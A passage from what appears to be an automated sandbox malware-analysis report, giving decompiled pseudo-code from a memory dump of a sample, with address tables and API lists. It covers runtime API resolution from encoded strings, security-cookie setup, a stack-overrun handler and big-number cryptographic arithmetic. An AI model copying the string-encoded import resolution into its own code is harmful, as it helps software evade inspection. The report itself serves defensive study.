								 *((intOrPtr*)( *((intOrPtr*)(_t70 + 0xf8))))(_v12);
								 *_a4 = _v16;
							}
						}
						goto L22;
					}
					_t30 =  &_v24; // 0x3c4354
					_push( &_v20);
					_push(1);
					_push(0);
					_push(0);
					if( *_t57() == 0) {
						goto L17;
					}
					_t32 =  &_v24; // 0x3c4354
					_t120 =  *_t32;
					_t128 = _v20;
					_t74 = 0;
					if(_t120 <= 0) {
						L14:
						_t75 =  *0x3e85f8; // 0x0
						if(_t75 != 0) {
							 *_t75(_t128);
						}
						if(_t131 != 0xffffffff) {
							goto L19;
						} else {
							goto L17;
						}
					} else {
						_t104 = _t128 + 8;
						while( *_t104 != 0) {
							_t74 = _t74 + 1;
							_t104 = _t104 + 0xc;
							if(_t74 < _t120) {
								continue;
							}
							goto L14;
						}
						_t131 =  *(_t128 + (_t74 + _t74 * 2) * 4);
						goto L14;
					}
				}
				E003C6CB0( &_v160, 0x97);
				_t124 =  *0x3e8628; // 0x622508
				_t59 =  *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x48))))( &_v160);
				_t132 = _t59;
				if(_t132 == 0) {
					goto L24;
				}
				E003C6CB0( &_v160, 0x98);
				 *0x3e85dc = GetProcAddress(_t132,  &_v160);
				E003C6CB0( &_v160, 0x99);
				 *0x3e85f8 = GetProcAddress(_t132,  &_v160);
				E003C6CB0( &_v160, 0x9a);
				 *0x3e85fc = GetProcAddress(_t132,  &_v160);
				E003C6CB0( &_v160, 0x9b);
				_t59 = GetProcAddress(_t132,  &_v160);
				 *0x3e85c8 = _t59;
				if(_t59 == 0) {
					goto L24;
				}
				goto L3;
			}



































    0x003cf99e
    0x003cf9a1
    0x003cf9a8
    0x003cf9ab
    0x003cf9ae
    0x003cf9b1
    0x003cf9b7
    0x003cfa87
    0x003cfa87
    0x003cfa90
    0x003cfa9b
    0x003cfa9b
    0x003cfaa3
    0x003cfaaa
    0x003cfaac
    0x003cfabb
    0x003cfabc
    0x003cfac1
    0x003cfac6
    0x003cfad3
    0x003cfae0
    0x003cfae7
    0x003cfaf5
    0x003cfaf5
    0x003cfac6
    0x003cfaf7
    0x003cfafc
    0x003cfb01
    0x003cfb49
    0x003cfb49
    0x003cfb50
    0x003cfbb4
    0x003cfbb4
    0x003cfbb9
    0x003cfbeb
    0x003cfbeb
    0x003cfbeb
    0x003cfbbb
    0x003cfbd1
    0x003cfbd6
    0x00000000
    0x003cfbe3
    0x003cfb54
    0x003cfb59
    0x00000000
    0x00000000
    0x003cfb5b
    0x003cfb5b
    0x003cfb67
    0x003cfb6c
    0x003cfb6d
    0x003cfb76
    0x003cfb7b
    0x003cfb83
    0x003cfb8a
    0x003cfb8c
    0x003cfb8e
    0x003cfb8f
    0x003cfb94
    0x003cfb99
    0x003cfb9e
    0x003cfbaa
    0x003cfbb2
    0x003cfbb2
    0x003cfb99
    0x00000000
    0x003cfb76
    0x003cfb03
    0x003cfb0a
    0x003cfb0b
    0x003cfb0d
    0x003cfb0e
    0x003cfb13
    0x00000000
    0x00000000
    0x003cfb15
    0x003cfb15
    0x003cfb18
    0x003cfb1b
    0x003cfb1f
    0x003cfb38
    0x003cfb38
    0x003cfb3f
    0x003cfb42
    0x003cfb42
    0x003cfb47
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003cfb21
    0x003cfb21
    0x003cfb24
    0x003cfb28
    0x003cfb29
    0x003cfb2e
    0x00000000
    0x00000000
    0x00000000
    0x003cfb30
    0x003cfb35
    0x00000000
    0x003cfb35
    0x003cfb1f
    0x003cf9c9
    0x003cf9ce
    0x003cf9e1
    0x003cf9e3
    0x003cf9e7
    0x00000000
    0x00000000
    0x003cf9f9
    0x003cfa11
    0x003cfa22
    0x003cfa40
    0x003cfa45
    0x003cfa63
    0x003cfa68
    0x003cfa78
    0x003cfa7a
    0x003cfa81
    0x00000000
    0x00000000
    0x00000000

    APIs
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CFA0F
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CFA32
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CFA55
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CFA78
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C7131, Relevance: 7.5, APIs: 5, Instructions: 49timethread
    C-Code - Quality: 100%
    			E003C7131() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t22;
				signed int _t23;
				signed int _t32;

				_t14 =  *0x3e8100; // 0x59defe91
				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
				if(_t14 == 0xbb40e64e || (0xffff0000 & _t14) == 0) {
					GetSystemTimeAsFileTime( &_v12);
					_t16 = GetCurrentProcessId();
					_t17 = GetCurrentThreadId();
					_t18 = GetTickCount();
					QueryPerformanceCounter( &_v20);
					_t22 = _v16 ^ _v20.LowPart;
					_t32 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
					if(_t32 == 0xbb40e64e || ( *0x3e8100 & 0xffff0000) == 0) {
						_t32 = 0xbb40e64f;
					}
					 *0x3e8100 = _t32;
					 *0x3e8104 =  !_t32;
					return _t22;
				} else {
					_t23 =  !_t14;
					 *0x3e8104 = _t23;
					return _t23;
				}
			}













    0x003c7139
    0x003c713e
    0x003c7142
    0x003c7154
    0x003c7168
    0x003c7174
    0x003c717c
    0x003c7184
    0x003c7190
    0x003c7199
    0x003c719c
    0x003c71a0
    0x003c71aa
    0x003c71aa
    0x003c71af
    0x003c71b7
    0x00000000
    0x003c715a
    0x003c715a
    0x003c715c
    0x00000000
    0x003c715c

    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 003C7168
    • GetCurrentProcessId.KERNEL32 ref: 003C7174
    • GetCurrentThreadId.KERNEL32 ref: 003C717C
    • GetTickCount.KERNEL32 ref: 003C7184
    • QueryPerformanceCounter.KERNEL32(?), ref: 003C7190
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C2B83, Relevance: 6.0, APIs: 4, Instructions: 48
    C-Code - Quality: 92%
    			E003C2B83(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr* _t26;
				void* _t29;

				_t29 = __ecx -  *0x3e8100; // 0x59defe91
				if(_t29 != 0) {
					 *0x3e8760 = __eax;
					 *0x3e875c = __ecx;
					 *0x3e8758 = __edx;
					 *0x3e8754 = __ebx;
					 *0x3e8750 = __esi;
					 *0x3e874c = __edi;
					 *0x3e8778 = ss;
					 *0x3e876c = cs;
					 *0x3e8748 = ds;
					 *0x3e8744 = es;
					 *0x3e8740 = fs;
					 *0x3e873c = gs;
					asm("pushfd");
					_pop( *0x3e8770);
					 *0x3e8764 =  *_t26;
					 *0x3e8768 = _v0;
					 *0x3e8774 =  &_a4;
					 *0x3e86b0 = 0x10001;
					_t11 =  *0x3e8768; // 0x0
					 *0x3e866c = _t11;
					 *0x3e8660 = 0xc0000409;
					 *0x3e8664 = 1;
					_t12 =  *0x3e8100; // 0x59defe91
					_v812 = _t12;
					_t13 =  *0x3e8104; // 0xa621016e
					_v808 = _t13;
					SetUnhandledExceptionFilter(0);
					UnhandledExceptionFilter(0x3e60b8);
					return TerminateProcess(GetCurrentProcess(), 0xc0000409);
				} else {
					return __eax;
				}
			}












    0x003c2b83
    0x003c2b89
    0x003cda0f
    0x003cda14
    0x003cda1a
    0x003cda20
    0x003cda26
    0x003cda2c
    0x003cda32
    0x003cda39
    0x003cda40
    0x003cda47
    0x003cda4e
    0x003cda55
    0x003cda5c
    0x003cda5d
    0x003cda66
    0x003cda6e
    0x003cda76
    0x003cda81
    0x003cda8b
    0x003cda90
    0x003cda95
    0x003cda9f
    0x003cdaa9
    0x003cdaae
    0x003cdab4
    0x003cdab9
    0x003cdac1
    0x003cdacc
    0x003cdae5
    0x003c2b8b
    0x003c2b8b
    0x003c2b8b

    APIs
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003CDAC1
    • UnhandledExceptionFilter.KERNEL32(003E60B8), ref: 003CDACC
    • GetCurrentProcess.KERNEL32(C0000409), ref: 003CDAD7
    • TerminateProcess.KERNEL32(00000000), ref: 003CDADE
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003DD481, Relevance: 5.2, APIs: 2, Strings: 1, Instructions: 681Crypto
    C-Code - Quality: 89%
    			E003DD481(void* __ecx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				char _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				char _v108;
				void* _v112;
				void* _v116;
				intOrPtr _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr _v132;
				signed int _v136;
				char _v140;
				intOrPtr _v144;
				signed int _v148;
				signed int _v152;
				intOrPtr _v156;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char** _t331;
				signed int _t333;
				signed int _t335;
				signed int _t339;
				signed int _t343;
				void* _t344;
				signed int _t346;
				signed int _t348;
				signed int _t356;
				signed int _t357;
				signed int _t366;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				void* _t373;
				void* _t378;
				signed int _t379;
				intOrPtr* _t380;
				intOrPtr _t383;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t393;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t404;
				signed int _t406;
				signed int _t412;
				void* _t413;
				signed int _t416;
				void* _t417;
				signed int _t421;
				signed int _t422;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int* _t430;
				signed int _t432;
				unsigned int _t434;
				unsigned int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				intOrPtr _t440;
				signed int _t442;
				intOrPtr* _t443;
				signed int _t446;
				signed int _t448;
				signed int _t449;
				intOrPtr _t454;
				signed int _t455;
				void* _t457;
				signed int _t458;
				signed int _t459;
				signed int _t465;
				signed int _t467;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				void* _t478;
				signed int _t486;
				intOrPtr* _t487;
				intOrPtr _t488;
				signed int _t492;
				signed int _t495;
				signed int* _t501;
				signed int _t503;
				intOrPtr* _t504;
				unsigned int _t512;
				signed int _t513;
				intOrPtr _t514;
				signed int _t525;
				signed int _t544;
				signed int _t545;
				signed int _t546;
				intOrPtr _t553;
				void* _t560;
				char _t561;
				void* _t562;
				signed int _t564;
				signed int _t566;
				signed int _t569;
				signed int _t571;
				void* _t572;
				void* _t573;
				intOrPtr _t574;
				signed int _t577;
				signed int _t579;
				intOrPtr _t583;
				signed int _t589;
				signed int _t590;
				intOrPtr* _t591;
				void* _t593;
				void* _t594;
				signed int _t596;
				signed int _t599;
				signed int _t602;
				signed int _t603;
				void* _t608;
				void* _t609;

				_t478 = __ecx;
				_t331 = _a16;
				_t473 = _t331[1];
				_v112 = 0;
				_v116 = 0;
				_v68 = 0;
				_v16 = 0;
				_v36 = _t473;
				if(( *( *_t331) & 0x00000001) == 0) {
					return 0;
				}
				_t531 = _a12;
				_t333 = E003D6518(_a12);
				_v8 = _t333;
				__eflags = _t333;
				if(_t333 == 0) {
					return E003D6732(_a4, 1);
				}
				_t555 = _a20;
				E003DA694(_a20);
				_t335 = E003DDF19();
				_v12 = _t335;
				__eflags = _t335;
				if(__eflags == 0) {
					L130:
					E003DA6BB(_a20);
					return _v112;
				} else {
					_t339 = L003DDF89(_t473, _t478, 0, __eflags, _t335, _a16, _t555);
					_t609 = _t608 + 0xc;
					__eflags = _t339;
					if(_t339 == 0) {
						L128:
						E003DDF5C(_v12);
						__eflags = _v16;
						if(_v16 != 0) {
							memset(_v16, 0, _v68);
							 *0x3e8540(_v116);
						}
						goto L130;
					}
					_t343 = _v8;
					__eflags = _t343 - 0x3a9;
					if(_t343 <= 0x3a9) {
						__eflags = _t343 - 0x132;
						if(_t343 <= 0x132) {
							__eflags = _t343 - 0x59;
							if(_t343 <= 0x59) {
								__eflags = _t343 - 0x16;
								_t21 = _t343 - 0x16 > 0;
								__eflags = _t21;
								_v24 = (0 | _t21) + (0 | _t21) + 1;
							} else {
								_v24 = 4;
							}
						} else {
							_v24 = 5;
						}
					} else {
						_v24 = 6;
					}
					_t589 = 1 << _v24;
					_t344 = _t473 + _t473;
					_v20 = 1;
					__eflags = _t344 - 1;
					if(_t344 <= 1) {
						_t344 = 1;
					}
					_t590 = _t589 * _t473;
					_t346 = _t344 + _t590 << 2;
					_v68 = _t346;
					_t348 =  *0x3e8538(_t346 + 0x40);
					_v116 = _t348;
					__eflags = _t348;
					if(__eflags == 0) {
						goto L128;
					} else {
						_t560 = _t348 - (_t348 & 0x0000003f) + 0x40;
						_v16 = _t560;
						memset(_t560, 0, _v68);
						_t561 = _t560 + _t590 * 4;
						_v108 = _t561 + _t473 * 4;
						_push(2);
						_v104 = 0;
						_v84 = 0;
						_v96 = 0;
						_v76 = 0;
						_v92 = 0;
						_v72 = 0;
						_v88 = _t561;
						_t562 = _v12 + 4;
						_v100 = _t473;
						_v80 = _t473;
						_t356 = E003DDC59(_a20, _t348 & 0x0000003f, _t531, __eflags,  &_v88, "�h>", _t562, _v12);
						_t609 = _t609 + 0x1c;
						__eflags = _t356;
						if(_t356 == 0) {
							goto L128;
						}
						_t591 = _a8;
						_t474 = _a16;
						_t486 = 0;
						__eflags =  *(_t591 + 0xc);
						if( *(_t591 + 0xc) != 0) {
							L34:
							_t357 =  *(_t591 + 4);
							_v32 = _t486;
							__eflags = _t357 - _t486;
							if(_t357 <= _t486) {
								L36:
								__eflags =  *(_t591 + 0x10) & 0x00000004;
								if(( *(_t591 + 0x10) & 0x00000004) != 0) {
									L38:
									_v32 = 1;
									L39:
									__eflags =  *((intOrPtr*)(_t474 + 4)) - _t486;
									if( *((intOrPtr*)(_t474 + 4)) == _t486) {
										goto L128;
									}
									__eflags = _v32 - _t486;
									if(_v32 != _t486) {
										L44:
										_t592 = _a20;
										E003DA694(_a20);
										_v56 = E003DA715(_a20);
										_t475 = E003DA715(_a20);
										_t564 = E003DA715(_a20);
										_v48 = _t564;
										_t366 = E003DA715(_t592);
										__eflags = _v56;
										_v44 = _t366;
										if(_v56 == 0) {
											L118:
											E003DA6BB(_a20);
											goto L128;
										}
										__eflags = _t475;
										if(_t475 == 0) {
											goto L118;
										}
										__eflags = _t564;
										if(_t564 == 0) {
											goto L118;
										}
										__eflags = _t366;
										if(_t366 == 0) {
											goto L118;
										}
										_t532 = _a16;
										_t370 = E003D6518(_a16) & 0x8000001f;
										__eflags = _t370;
										if(_t370 < 0) {
											_t370 = (_t370 - 0x00000001 | 0xffffffe0) + 1;
											__eflags = _t370;
										}
										_t593 = 0x20;
										_t594 = _t593 - _t370;
										_t371 = E003DA920(_t532, _t564, _t532, _t594);
										_t609 = _t609 + 0xc;
										__eflags = _t371;
										if(_t371 == 0) {
											goto L118;
										} else {
											 *(_t564 + 0xc) =  *(_t564 + 0xc) & 0x00000000;
											_v156 = _t594 + 0x20;
											_t372 = E003DA920(_t532, _t475, _a8, _t594 + 0x20);
											_t609 = _t609 + 0xc;
											__eflags = _t372;
											if(_t372 == 0) {
												goto L118;
											}
											 *(_t475 + 0xc) =  *(_t475 + 0xc) & 0x00000000;
											__eflags = _v32;
											if(_v32 == 0) {
												L67:
												_t487 = _v48;
												_t596 =  *(_t487 + 4);
												_t373 =  *_t475;
												_t488 =  *_t487;
												_v128 = _v128 & 0x00000000;
												_t566 =  *(_t475 + 4) - _t596;
												_v140 = _t373 + _t566 * 4;
												_v132 =  *((intOrPtr*)(_t475 + 8)) - _t566;
												_v124 =  *(_t475 + 0x10) | 0x00000002;
												_t538 =  *(_t488 + _t596 * 4 - 4);
												_v60 = _t596;
												_v28 = _t566;
												_v136 = _t596;
												_v52 =  *(_t488 + _t596 * 4 - 4);
												__eflags = _t596 - 1;
												if(_t596 != 1) {
													_v64 =  *((intOrPtr*)(_t488 + _t596 * 4 - 8));
												} else {
													_v64 = _v64 & 0x00000000;
												}
												_v40 = _t373 +  *(_t475 + 4) * 4 - 4;
												_t492 = _v44;
												 *(_t492 + 0xc) =  *(_a16 + 0xc) ^  *(_a8 + 0xc);
												_t378 = _t566 + 1;
												__eflags = _t378 -  *((intOrPtr*)(_t492 + 8));
												if(_t378 >  *((intOrPtr*)(_t492 + 8))) {
													_t379 = E003D665B(_t378, _v44);
													_t596 = _v60;
													_t566 = _v28;
												} else {
													_t379 = _t492;
												}
												__eflags = _t379;
												if(_t379 == 0) {
													goto L118;
												} else {
													_t380 = _v44;
													 *((intOrPtr*)(_t380 + 4)) = _t566 - _v32;
													_t495 = _v56;
													_a16 =  *_t380 + _t566 * 4 - 4;
													_t383 = _t596 + 1;
													_v120 = _t383;
													__eflags = _t383 -  *((intOrPtr*)(_t495 + 8));
													if(_t383 >  *((intOrPtr*)(_t495 + 8))) {
														_t384 = E003D665B(_v120, _v56);
														_t596 = _v60;
														_t566 = _v28;
													} else {
														_t384 = _t495;
													}
													__eflags = _t384;
													if(_t384 == 0) {
														goto L118;
													} else {
														__eflags = _v32;
														if(_v32 == 0) {
															_t538 = _v48;
															_t448 = E003D687A( &_v140, _v48);
															__eflags = _t448;
															if(_t448 < 0) {
																_t449 = _v44;
																_t217 = _t449 + 4;
																 *_t217 =  *(_t449 + 4) - 1;
																__eflags =  *_t217;
															} else {
																_t538 =  *_v48;
																E003D70EC(_v140, _v140,  *_v48, _t596);
																 *_a16 = 1;
															}
														}
														_t385 = _v44;
														__eflags =  *(_t385 + 4);
														if( *(_t385 + 4) != 0) {
															_t223 =  &_a16;
															 *_t223 = _a16 - 4;
															__eflags =  *_t223;
														} else {
															 *(_t385 + 0xc) =  *(_t385 + 0xc) & 0x00000000;
														}
														_t569 = _t566 - 1;
														__eflags = _t569;
														if(_t569 <= 0) {
															L106:
															_t386 =  *(_t475 + 4);
															__eflags = _t386;
															if(_t386 <= 0) {
																L110:
																_t599 =  *(_a8 + 0xc);
																E003DAA38(_v156, _t475, _t538,  &_v108);
																_pop(_t486);
																__eflags = _v104;
																if(_v104 != 0) {
																	_v96 = _t599;
																}
																__eflags = _v32;
																if(_v32 == 0) {
																	L117:
																	E003DA6BB(_a20);
																	L43:
																	_t393 = _v12;
																	_push(_t393);
																	_push(_t393 + 4);
																	_push( &_v108);
																	L20:
																	_push( &_v108);
																	_t398 = E003DDC59(_a20, _t486, _t538, __eflags);
																	_t609 = _t609 + 0x10;
																	__eflags = _t398;
																	if(_t398 == 0) {
																		goto L128;
																	}
																	_t399 = E003DD3E7(_v36,  &_v88, _v16, 0, _v20);
																	_t609 = _t609 + 0xc;
																	__eflags = _t399;
																	if(_t399 == 0) {
																		goto L128;
																	}
																	_t540 = _v36;
																	_t601 =  &_v108;
																	_t400 = E003DD3E7(_v36,  &_v108, _v16, 1, _v20);
																	_t609 = _t609 + 0xc;
																	__eflags = _t400;
																	if(_t400 == 0) {
																		goto L128;
																	}
																	__eflags = _v24 - 1;
																	if(__eflags <= 0) {
																		L30:
																		_v8 = _v8 - 1;
																		_t401 = _v8;
																		asm("cdq");
																		_t541 = _t401 % _v24;
																		_t602 = 0;
																		_t571 = _t401 % _v24;
																		__eflags = _t571;
																		if(_t571 < 0) {
																			L32:
																			_t497 =  &_v88;
																			_t404 = E003DD41A(_v36,  &_v88, _v16, _t602, _v20);
																			_t609 = _t609 + 0xc;
																			while(1) {
																				__eflags = _t404;
																				if(_t404 == 0) {
																					goto L128;
																				}
																				_t572 = 0;
																				__eflags = _v8;
																				if(__eflags >= 0) {
																					_t603 = 0;
																					__eflags = _v24;
																					if(__eflags <= 0) {
																						L122:
																						_t497 =  &_v108;
																						_t406 = E003DD41A(_v36,  &_v108, _v16, _t603, _v20);
																						_t609 = _t609 + 0xc;
																						__eflags = _t406;
																						if(__eflags == 0) {
																							goto L128;
																						}
																						_t404 = E003DDC59(_a20,  &_v108, _t541, __eflags,  &_v88,  &_v88,  &_v108, _v12);
																						_t609 = _t609 + 0x10;
																						continue;
																					} else {
																						goto L120;
																					}
																					while(1) {
																						L120:
																						_t412 = E003DDC59(_a20, _t497, _t541, __eflags,  &_v88,  &_v88,  &_v88, _v12);
																						_t609 = _t609 + 0x10;
																						__eflags = _t412;
																						if(_t412 == 0) {
																							goto L128;
																						}
																						_t413 = E003D691C(_a12, _t541, _v8);
																						_t572 = _t572 + 1;
																						_v8 = _v8 - 1;
																						_pop(_t497);
																						_t603 = _t413 + _t603 * 2;
																						__eflags = _t572 - _v24;
																						if(__eflags < 0) {
																							continue;
																						}
																						goto L122;
																					}
																					goto L128;
																				}
																				_t416 = E003DDECF(_a20, _t497, __eflags, _a4,  &_v88, _v12);
																				_t609 = _t609 + 0xc;
																				__eflags = _t416;
																				if(_t416 != 0) {
																					_v112 = 1;
																				}
																				goto L128;
																			}
																			goto L128;
																		} else {
																			goto L31;
																		}
																		do {
																			L31:
																			_t417 = E003D691C(_a12, _t541, _v8);
																			_v8 = _v8 - 1;
																			_t571 = _t571 - 1;
																			__eflags = _t571;
																			_t602 = _t417 + _t602 * 2;
																		} while (_t571 >= 0);
																		goto L32;
																	}
																	_t421 = E003DDC59(_a20, _t486, _t540, __eflags,  &_v88,  &_v108, _t601, _v12);
																	_t609 = _t609 + 0x10;
																	__eflags = _t421;
																	if(_t421 == 0) {
																		goto L128;
																	}
																	_t542 = _v36;
																	_t422 = E003DD3E7(_v36,  &_v88, _v16, 2, _v20);
																	_t609 = _t609 + 0xc;
																	__eflags = _t422;
																	if(_t422 == 0) {
																		goto L128;
																	}
																	_t573 = 3;
																	__eflags = _v20 - _t573;
																	if(__eflags <= 0) {
																		goto L30;
																	} else {
																		goto L27;
																	}
																	while(1) {
																		L27:
																		_t427 = E003DDC59(_a20, _t486, _t542, __eflags,  &_v88,  &_v108,  &_v88, _v12);
																		_t609 = _t609 + 0x10;
																		__eflags = _t427;
																		if(_t427 == 0) {
																			goto L128;
																		}
																		_t542 = _v36;
																		_t428 = E003DD3E7(_v36,  &_v88, _v16, _t573, _v20);
																		_t609 = _t609 + 0xc;
																		__eflags = _t428;
																		if(_t428 == 0) {
																			goto L128;
																		}
																		_t573 = _t573 + 1;
																		__eflags = _t573 - _v20;
																		if(__eflags < 0) {
																			continue;
																		}
																		goto L30;
																	}
																	goto L128;
																} else {
																	_t429 = _v44;
																	_t486 =  *(_t429 + 4);
																	__eflags = _t486;
																	if(_t486 <= 0) {
																		goto L117;
																	}
																	_t501 =  *_t429 + _t486 * 4 - 4;
																	while(1) {
																		_t538 =  *_t501;
																		_t486 = _t501 - 4;
																		__eflags =  *_t501;
																		if( *_t501 != 0) {
																			goto L117;
																		}
																		 *(_t429 + 4) =  *(_t429 + 4) - 1;
																		__eflags =  *(_t429 + 4);
																		if( *(_t429 + 4) > 0) {
																			continue;
																		}
																		goto L117;
																	}
																	goto L117;
																}
															}
															_t430 =  *_t475 + _t386 * 4 - 4;
															while(1) {
																_t503 =  *_t430;
																_t430 = _t430 - 4;
																__eflags = _t503;
																if(_t503 != 0) {
																	goto L110;
																}
																 *(_t475 + 4) =  *(_t475 + 4) - 1;
																__eflags =  *(_t475 + 4);
																if( *(_t475 + 4) > 0) {
																	continue;
																}
																goto L110;
															}
															goto L110;
														} else {
															_t432 = _a16 - _v40;
															__eflags = _t432;
															_v60 = _t569;
															_v148 = _t432;
															do {
																_t504 = _v40;
																_t433 =  *_t504;
																_t574 =  *((intOrPtr*)(_t504 - 4));
																__eflags =  *_t504 - _v52;
																if( *_t504 != _v52) {
																	_t434 = E003D6F02(_t433, _t574, _v52);
																	_v144 = _t574 - _t434 * _v52;
																	_a16 = _t434;
																	_t435 = _v64;
																	_t544 = _t435 & 0x0000ffff;
																	_v28 = _t434 & 0x0000ffff;
																	_t577 = _t434 >> 0x10;
																	_t436 = _t435 >> 0x10;
																	_t545 = _t544 * _v28;
																	_v152 = _t577;
																	_t437 = _t436 * _v152;
																	_t579 = _t436 * _v28;
																	_t512 = _t544 * _t577 + _t579;
																	_v28 = _t579;
																	__eflags = _t512 - _t579;
																	if(_t512 < _t579) {
																		_t437 = _t437 + 0x10000;
																		__eflags = _t437;
																	}
																	_t513 = _t512 << 0x10;
																	_t546 = _t545 + _t513;
																	_t438 = _t437 + (_t512 >> 0x10);
																	__eflags = _t546 - _t513;
																	if(_t546 < _t513) {
																		_t438 = _t438 + 1;
																		__eflags = _t438;
																	}
																	_t514 = _v144;
																	while(1) {
																		__eflags = _t438 - _t514;
																		if(__eflags < 0) {
																			break;
																		}
																		if(__eflags != 0) {
																			L96:
																			_t514 = _t514 + _v52;
																			_a16 = _a16 - 1;
																			__eflags = _t514 - _v52;
																			if(_t514 < _v52) {
																				break;
																			}
																			__eflags = _t546 - _v64;
																			if(_t546 < _v64) {
																				_t438 = _t438 - 1;
																				__eflags = _t438;
																			}
																			_t546 = _t546 - _v64;
																			__eflags = _t546;
																			continue;
																		}
																		_t583 = _v40;
																		__eflags = _t546 -  *((intOrPtr*)(_t583 - 8));
																		if(_t546 <=  *((intOrPtr*)(_t583 - 8))) {
																			break;
																		}
																		goto L96;
																	}
																	L101:
																	_t582 = _v48;
																	_t440 = E003D6BFB( *_v48,  *_v56, _t596);
																	_v140 = _v140 - 4;
																	 *((intOrPtr*)( *_v56 + _t596 * 4)) = _t440;
																	_t442 = E003D70EC(_v140, _v140,  *_v56, _v120);
																	__eflags = _t442;
																	if(_t442 == 0) {
																		L104:
																		_t443 = _v40;
																		goto L105;
																	}
																	_a16 = _a16 - 1;
																	_t446 = E003D6FFC( *_t582, _v140, _v140, _t596);
																	__eflags = _t446;
																	if(_t446 == 0) {
																		goto L104;
																	}
																	_t443 = _v40;
																	 *_t443 =  *_t443 + 1;
																	goto L105;
																}
																_a16 = _a16 | 0xffffffff;
																goto L101;
																L105:
																_t538 = _a16;
																 *(_t443 + _v148) = _a16;
																_t272 =  &_v60;
																 *_t272 = _v60 - 1;
																__eflags =  *_t272;
																_v40 = _t443 - 4;
															} while ( *_t272 != 0);
															goto L106;
														}
													}
												}
											}
											_t454 =  *((intOrPtr*)(_t564 + 4));
											_t525 =  *(_t475 + 4);
											__eflags = _t525 - _t454 + 1;
											if(_t525 > _t454 + 1) {
												_t584 = _t525 + 1;
												__eflags = _t525 + 1 -  *((intOrPtr*)(_t475 + 8));
												if(_t525 + 1 >  *((intOrPtr*)(_t475 + 8))) {
													_t455 = E003D665B(_t584, _t475);
												} else {
													_t455 = _t475;
												}
												__eflags = _t455;
												if(_t455 == 0) {
													goto L118;
												} else {
													 *( *_t475 +  *(_t475 + 4) * 4) =  *( *_t475 +  *(_t475 + 4) * 4) & 0x00000000;
													_t152 = _t475 + 4;
													 *_t152 =  *(_t475 + 4) + 1;
													__eflags =  *_t152;
													goto L67;
												}
											}
											_t457 = _t454 + 2;
											__eflags = _t457 -  *((intOrPtr*)(_t475 + 8));
											if(_t457 >  *((intOrPtr*)(_t475 + 8))) {
												_t458 = E003D665B(_t457, _t475);
												_t564 = _v48;
											} else {
												_t458 = _t475;
											}
											__eflags = _t458;
											if(_t458 == 0) {
												goto L118;
											} else {
												_t459 =  *(_t475 + 4);
												while(1) {
													__eflags = _t459 -  *((intOrPtr*)(_t564 + 4)) + 2;
													if(_t459 >=  *((intOrPtr*)(_t564 + 4)) + 2) {
														break;
													}
													 *( *_t475 + _t459 * 4) =  *( *_t475 + _t459 * 4) & 0x00000000;
													_t459 = _t459 + 1;
													__eflags = _t459;
												}
												 *(_t475 + 4) =  *((intOrPtr*)(_t564 + 4)) + 2;
												goto L67;
											}
										}
									}
									_t538 = _t474;
									_t465 = E003D687A(_t591, _t474);
									__eflags = _t465;
